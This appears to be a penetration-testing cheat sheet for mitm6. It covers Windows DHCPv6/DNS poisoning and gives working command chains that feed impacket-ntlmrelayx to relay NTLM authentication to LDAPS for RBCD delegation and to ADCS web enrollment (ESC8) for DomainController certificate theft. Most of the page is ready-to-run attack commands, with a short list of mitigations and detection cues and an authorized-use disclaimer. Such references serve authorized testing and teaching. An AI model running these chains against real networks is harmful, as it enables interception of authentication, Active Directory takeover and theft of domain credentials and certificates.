โ† All cheat sheets

MITM6

Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.

OVERVIEW#

mitm6 abuses default IPv6 behaviour in Windows networks: it replies to
DHCPv6 requests, becomes the victim's DNS server, and lets an attacker
intercept/relay traffic (classically WPAD -> NTLM relay to LDAP/ADCS).
A staple front-half of modern relay chains. Authorized engagements only.

CORE CONCEPT#

# Windows prefers IPv6 and auto-requests a DHCPv6 lease
# mitm6 answers -> becomes primary DNS for the victim
# Victim then resolves attacker-controlled names (e.g. WPAD)
# Combine with ntlmrelayx to relay coerced auth to LDAP/ADCS
# Pairs directly with the NTLM-RELAY sheet

BASIC USAGE#

mitm6 -d corp.lu                               # Target a domain (DNS spoof)
mitm6 -i eth0 -d corp.lu                        # Specify interface
mitm6 -d corp.lu -v                             # Verbose
sudo mitm6 -d corp.lu                            # Needs root (raw sockets)

SCOPING (BE SURGICAL)#

mitm6 -d corp.lu --host-allowlist host1 host2  # Only spoof these hosts
mitm6 -d corp.lu --host-denylist dc01          # Never spoof these
mitm6 -d corp.lu --domain-allowlist wpad.corp.lu
                                               # Only answer these names
mitm6 -d corp.lu --ignore-nofqdn               # Ignore non-FQDN queries
# Scoping is important: unrestricted mitm6 can disrupt a whole subnet

TIMING / BEHAVIOUR#

mitm6 -d corp.lu -hw 5                           # DHCPv6 handshake wait
mitm6 -d corp.lu --relay <target>               # Relay hint (older flag)
# Leave mitm6 running while ntlmrelayx handles inbound auth

FULL CHAIN (WITH NTLMRELAYX)#

# Terminal 1 - relay to LDAPS for RBCD / delegate access:
impacket-ntlmrelayx -6 -t ldaps://<dc> -wh wpad.corp.lu \
  --delegate-access -smb2support
# Terminal 2 - poison IPv6/DNS:
sudo mitm6 -d corp.lu
# -wh sets the WPAD host; -6 tells ntlmrelayx to listen on IPv6

# ESC8 variant - relay coerced auth to ADCS web enrollment:
impacket-ntlmrelayx -6 -t http://<ca>/certsrv/certfnsh.asp \
  -wh wpad.corp.lu --adcs --template DomainController -smb2support
sudo mitm6 -d corp.lu

MITIGATIONS (DEFENSIVE)#

# - Disable IPv6 if unused, OR block rogue DHCPv6 (RA Guard /
#   DHCPv6 Guard on switches)
# - Disable WPAD (GPO) and set the WPAD DNS entry to a real host
# - Enforce LDAP signing + channel binding (kills the LDAP relay)
# - Enable EPA on ADCS web enrollment (kills ESC8)
# - Monitor for unexpected DHCPv6 servers / IPv6 DNS changes

EXAMPLES#

# Scoped IPv6 takeover feeding an LDAPS relay for RBCD
impacket-ntlmrelayx -6 -t ldaps://dc.corp.lu -wh wpad.corp.lu \
  --delegate-access -smb2support
sudo mitm6 -d corp.lu --host-allowlist ws01.corp.lu

# IPv6 -> ADCS ESC8 certificate theft chain
impacket-ntlmrelayx -6 -t http://ca.corp.lu/certsrv/certfnsh.asp \
  -wh wpad.corp.lu --adcs --template DomainController -smb2support
sudo mitm6 -d corp.lu

NOTES#

- mitm6 is the coercion front-end; ntlmrelayx does the actual relay -
  always run them together (-6 and -wh on ntlmrelayx)
- SCOPE IT: use --host-allowlist/--domain-allowlist on production FS
  networks to avoid broad DNS disruption
- Reboots/lease renewals re-trigger spoofing; effect is not instant
- Detection: rogue DHCPv6 server, sudden IPv6 DNS assignment, WPAD
  lookups to unexpected hosts (see DEFENDER-KQL / SENTINEL-KQL sheets)
- Pairs with NTLM-RELAY.txt (relay targets, ESC8) and LDAP-ENUM.txt